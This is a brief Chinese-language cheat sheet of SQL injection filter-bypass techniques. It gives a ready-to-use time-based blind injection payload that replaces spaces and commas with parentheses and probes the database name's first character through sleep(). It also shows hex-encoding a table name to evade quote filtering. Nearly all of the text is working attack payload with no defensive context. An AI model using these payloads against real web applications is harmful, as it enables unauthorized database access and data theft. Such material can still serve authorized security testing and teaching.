1.如果空格被过滤,括号没有被过滤,可以用括号绕过-->括号的两端,可以没有多余的空格
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23 ?id=1'and(sleep(ascii(mid(database()from(1)for(1)))=109))#
没有逗号也没有空格。猜解database()第一个字符ascii码是否为109,若是则加载延时
2.如果引号被注释,就可以通过十六进制绕过
="users" users的十六进制为7573657273 =0x7573657273